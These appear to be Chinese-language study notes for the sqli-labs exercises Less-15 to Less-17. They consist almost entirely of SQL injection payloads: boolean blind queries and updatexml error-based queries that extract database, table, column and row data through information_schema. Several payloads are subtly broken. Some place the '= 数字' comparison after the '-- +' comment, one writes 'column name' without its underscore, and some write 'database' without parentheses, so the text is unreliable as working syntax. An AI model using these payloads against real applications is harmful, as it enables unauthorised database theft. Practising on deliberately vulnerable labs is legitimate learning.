【less-15:布尔盲注】
单引号闭合
1. ' or (length(database())) -- += 数字:判断数据库长度;
2. ' or (ascii(substr(database(),1,1))) -- += 数字:获取组成数据库的字符;
3. ' or (ascii(substr((select table_name from information_schema.tables where table_schema=database limit 0,1),1,1)))=数字 -- + :获取数据表名;
4. ' or (ascii(substr((select column_name from information_schema.columns where table_schema=database and table_name=数据表名 limit 0,1),1,1)))=数字 -- + :获取数据表字段;
【less-16:布尔盲注】
双引号括号 闭合
1. ") or (length(database()))= 数字 -- +:判断数据库长度;
2. ") or (ascii(substr(database(),1,1))) -- += 数字:获取组成数据库的字符;
3. ") or (ascii(substr((select table_name from information_schema.tables where table_schema=database limit 0,1),1,1)))=数字 -- + :获取数据表名;
4. ") or (ascii(substr((select column_name from information_schema.columns where table_schema=database and table_name=数据表名 limit 0,1),1,1)))=数字 -- + :获取数据表字段;
【less-17: 报错注入】
1.判断是否存在注入:'or 1=1--qwe
2.判断库名:'and updatexml(1,concat(0x7e,(SELECT database()),0x7e),1)-- +
3.判断表名:'and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='数据库' limit 0,1),0x7e),1)-- +
4.判断列名:' and updatexml(1,concat(0x7e,(select column name from information_schema.columns where table_schema='库名' and table_name='表名' limit 0,1),0x7e),1)-- +
5. 判断数据:' and updatexml(1,concat(0x7e,(select 字段 from 表名 limit 0,1),0x7e),1)-- +